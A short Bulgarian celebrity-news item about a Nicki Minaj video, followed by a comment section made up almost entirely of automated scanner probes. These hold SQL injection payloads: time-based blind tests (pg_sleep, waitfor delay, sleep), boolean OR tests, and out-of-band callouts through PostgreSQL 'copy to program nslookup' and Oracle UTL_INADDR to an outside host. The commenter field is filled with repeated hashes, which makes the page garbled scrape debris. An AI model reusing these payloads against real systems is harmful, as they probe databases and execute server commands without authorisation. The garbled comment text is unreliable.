Певица сваля гротесковия грим и слага просто черн очна линия, а косата й е руса или черна - без розово, синьо и т.н.

Това е може би най-личната песен, която американката е правила. Може би, заради това решава да е "истинска" във видеото, подкрепена от красиви тоалети от модните върхове.

Още за Ники Минаж.

259 Коментара

 1. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 2. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 3. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 4. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 5. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 6. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 7. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 8. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 9. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 10. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 11. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 12. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 13. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 14. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 15. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 16. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 17. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 18. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 19. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 20. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 21. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 22. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 23. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 24. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 25. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 26. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 27. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 28. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 29. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 30. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 31. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 32. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 33. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 34. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 35. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 36. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 37. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 38. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 39. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 40. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 41. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 42. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 43. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 44. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 45. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 46. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 47. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 48. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 49. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 50. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 51. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 52. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 53. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 54. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 55. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 56. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 57. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 58. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 59. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 60. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 61. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 62. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 63. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 64. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 65. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 66. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 67. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 68. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 69. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  895'

 70. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1';copy (select '') to program 'nslookup dns.sqli.\013405.299-3136.299.034bc.\1.bxss.me

 71. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1;copy (select '') to program 'nslookup dns.sqli.\013405.299-3135.299.034bc.\1.bxss.me'

 72. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  '||UTL_INADDR.get_host_address('dns.'||'sqli.013405.299-3134.299.034bc.1.bxss'||'.me')||'

 73. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1||UTL_INADDR.get_host_address('dns.'||'sqli.013405.299-3132.299.034bc.1.bxss'||'.me')

 74. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  ''||(select 1 from (select pg_sleep(39))x)||''

 75. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  '||(select 1 from (select pg_sleep(26))x)||'

 76. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  Tr3bXtqw'));select pg_sleep(26); --

 77. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  mRTpugHI');select pg_sleep(13); --

 78. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  DzxrNfSA';select pg_sleep(13); --

 79. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1));select pg_sleep(13); --

 80. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1);select pg_sleep(39); --

 81. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1;select pg_sleep(39); --

 82. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  LlJnFNoH'; waitfor delay '0:0:39' --

 83. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1 waitfor delay '0:0:39' --

 84. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1); waitfor delay '0:0:26' --

 85. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1; waitfor delay '0:0:26' --

 86. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  (select(0)from(select(sleep(26)))v)/*'+(select(0)from(select(sleep(26)))v)+'"+(select(0)from(select(sleep(26)))v)+"*/

 87. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  if(now()=sysdate(),sleep(13),0)/*'XOR(if(now()=sysdate(),sleep(13),0))OR'"XOR(if(now()=sysdate(),sleep(13),0))OR"*/

 88. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1" OR 3*2>(0+5+464-464) --

 89. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1" OR 3*2<(0+5+464-464) --

 90. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1" OR 3+464-464-1=0+0+0+1 --

 91. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1" OR 2+464-464-1=0+0+0+1 --

 92. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3*2>(0+5+663-663) or '9vR0zBmV'='

 93. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3*2<(0+5+663-663) or '9vR0zBmV'='

 94. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3+663-663-1=0+0+0+1 or '9vR0zBmV'='

 95. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 2+663-663-1=0+0+0+1 or '9vR0zBmV'='

 96. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3*2>(0+5+843-843) --

 97. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3*2<(0+5+843-843) --

 98. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3+843-843-1=0+0+0+1 --

 99. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 2+843-843-1=0+0+0+1 --

 100. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3*2>(0+5+904-904)

 101. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3*2<(0+5+904-904)

 102. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3+904-904-1=0+0+0+1

 103. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 2+904-904-1=0+0+0+1

 104. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3*2>(0+5+327-327) --

 105. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3*2<(0+5+327-327) --

 106. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3+327-327-1=0+0+0+1 --

 107. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 2+327-327-1=0+0+0+1 --

 108. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 109. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 110. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  693'

 111. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1';copy (select '') to program 'nslookup dns.sqli.\013405.299-2992.299.034bc.\1.bxss.me

 112. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1;copy (select '') to program 'nslookup dns.sqli.\013405.299-2991.299.034bc.\1.bxss.me'

 113. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  '||UTL_INADDR.get_host_address('dns.'||'sqli.013405.299-2990.299.034bc.1.bxss'||'.me')||'

 114. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1||UTL_INADDR.get_host_address('dns.'||'sqli.013405.299-2989.299.034bc.1.bxss'||'.me')

 115. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  ''||(select 1 from (select pg_sleep(18))x)||''

 116. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  '||(select 1 from (select pg_sleep(18))x)||'

 117. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  7IYqnd1P'));select pg_sleep(9); --

 118. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  5FwXS9pb');select pg_sleep(27); --

 119. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  nJcvKtov';select pg_sleep(27); --

 120. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1));select pg_sleep(18); --

 121. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1);select pg_sleep(18); --

 122. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1;select pg_sleep(18); --

 123. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  BR3TPFZs'; waitfor delay '0:0:9' --

 124. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1 waitfor delay '0:0:9' --

 125. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1); waitfor delay '0:0:27' --

 126. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1; waitfor delay '0:0:27' --

 127. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  (select(0)from(select(sleep(18)))v)/*'+(select(0)from(select(sleep(18)))v)+'"+(select(0)from(select(sleep(18)))v)+"*/

 128. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  if(now()=sysdate(),sleep(18),0)/*'XOR(if(now()=sysdate(),sleep(18),0))OR'"XOR(if(now()=sysdate(),sleep(18),0))OR"*/

 129. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1" OR 3*2>(0+5+344-344) --

 130. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1" OR 3*2<(0+5+344-344) --

 131. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1" OR 3+344-344-1=0+0+0+1 --

 132. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1" OR 2+344-344-1=0+0+0+1 --

 133. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3*2>(0+5+446-446) or 'kEqrtMNt'='

 134. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3*2<(0+5+446-446) or 'kEqrtMNt'='

 135. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3+446-446-1=0+0+0+1 or 'kEqrtMNt'='

 136. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 2+446-446-1=0+0+0+1 or 'kEqrtMNt'='

 137. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3*2>(0+5+828-828) --

 138. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3*2<(0+5+828-828) --

 139. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3+828-828-1=0+0+0+1 --

 140. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 2+828-828-1=0+0+0+1 --

 141. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3*2>(0+5+399-399)

 142. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3*2<(0+5+399-399)

 143. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3+399-399-1=0+0+0+1

 144. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 2+399-399-1=0+0+0+1

 145. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3*2>(0+5+799-799) --

 146. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3*2<(0+5+799-799) --

 147. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3+799-799-1=0+0+0+1 --

 148. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 2+799-799-1=0+0+0+1 --

 149. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 150. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 151. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 415'

  1

 152. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua';copy (select '') to program 'nslookup dns.sqli.\013405.299-2732.299.034bc.\1.bxss.me

  1

 153. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 '||UTL_INADDR.get_host_address('dns.'||'sqli.013405.299-2731.299.034bc.1.bxss'||'.me')||'

  1

 154. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 ''||(select 1 from (select pg_sleep(39))x)||''

  1

 155. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 '||(select 1 from (select pg_sleep(39))x)||'

  1

 156. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 plNirfsl'));select pg_sleep(26); --

  1

 157. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 EmFvKTU6');select pg_sleep(26); --

  1

 158. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 1aHoaToR';select pg_sleep(26); --

  1

 159. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 cqTejHAh'; waitfor delay '0:0:13' --

  1

 160. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 1 waitfor delay '0:0:13' --

  1

 161. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 (select(0)from(select(sleep(39)))v)/*'+(select(0)from(select(sleep(39)))v)+'"+(select(0)from(select(sleep(39)))v)+"*/

  1

 162. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 if(now()=sysdate(),sleep(39),0)/*'XOR(if(now()=sysdate(),sleep(39),0))OR'"XOR(if(now()=sysdate(),sleep(39),0))OR"*/

  1

 163. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1" OR 3*2>(0+5+962-962) --

  1

 164. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1" OR 3*2<(0+5+962-962) --

  1

 165. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1" OR 3+962-962-1=0+0+0+1 --

  1

 166. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1" OR 2+962-962-1=0+0+0+1 --

  1

 167. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3*2>(0+5+775-775) or '1eloGFgN'='

  1

 168. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3*2<(0+5+775-775) or '1eloGFgN'='

  1

 169. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3+775-775-1=0+0+0+1 or '1eloGFgN'='

  1

 170. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 2+775-775-1=0+0+0+1 or '1eloGFgN'='

  1

 171. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3*2>(0+5+108-108) --

  1

 172. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3*2<(0+5+108-108) --

  1

 173. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3+108-108-1=0+0+0+1 --

  1

 174. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 2+108-108-1=0+0+0+1 --

  1

 175. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3*2>(0+5+762-762)

  1

 176. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3*2<(0+5+762-762)

  1

 177. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3+762-762-1=0+0+0+1

  1

 178. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 2+762-762-1=0+0+0+1

  1

 179. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3*2>(0+5+325-325) --

  1

 180. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3*2<(0+5+325-325) --

  1

 181. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3+325-325-1=0+0+0+1 --

  1

 182. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 2+325-325-1=0+0+0+1 --

  1

 183. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 184. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 185. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 577'

  1

 186. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua';copy (select '') to program 'nslookup dns.sqli.\013405.299-2654.299.034bc.\1.bxss.me

  1

 187. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 '||UTL_INADDR.get_host_address('dns.'||'sqli.013405.299-2653.299.034bc.1.bxss'||'.me')||'

  1

 188. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 ''||(select 1 from (select pg_sleep(18))x)||''

  1

 189. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 '||(select 1 from (select pg_sleep(9))x)||'

  1

 190. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 wjJfvJsj'));select pg_sleep(9); --

  1

 191. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 leSQyERh');select pg_sleep(27); --

  1

 192. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 TxPbdF8z';select pg_sleep(27); --

  1

 193. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 1Ggi4La2'; waitfor delay '0:0:27' --

  1

 194. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 1 waitfor delay '0:0:27' --

  1

 195. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 (select(0)from(select(sleep(27)))v)/*'+(select(0)from(select(sleep(27)))v)+'"+(select(0)from(select(sleep(27)))v)+"*/

  1

 196. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 if(now()=sysdate(),sleep(18),0)/*'XOR(if(now()=sysdate(),sleep(18),0))OR'"XOR(if(now()=sysdate(),sleep(18),0))OR"*/

  1

 197. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1" OR 3*2>(0+5+974-974) --

  1

 198. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1" OR 3*2<(0+5+974-974) --

  1

 199. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1" OR 3+974-974-1=0+0+0+1 --

  1

 200. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1" OR 2+974-974-1=0+0+0+1 --

  1

 201. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3*2>(0+5+17-17) or 'l5KSXti7'='

  1

 202. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3*2<(0+5+17-17) or 'l5KSXti7'='

  1

 203. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3+17-17-1=0+0+0+1 or 'l5KSXti7'='

  1

 204. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 2+17-17-1=0+0+0+1 or 'l5KSXti7'='

  1

 205. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3*2>(0+5+981-981) --

  1

 206. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3*2<(0+5+981-981) --

  1

 207. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3+981-981-1=0+0+0+1 --

  1

 208. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 2+981-981-1=0+0+0+1 --

  1

 209. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3*2>(0+5+80-80)

  1

 210. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3*2<(0+5+80-80)

  1

 211. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3+80-80-1=0+0+0+1

  1

 212. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 2+80-80-1=0+0+0+1

  1

 213. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3*2>(0+5+719-719) --

  1

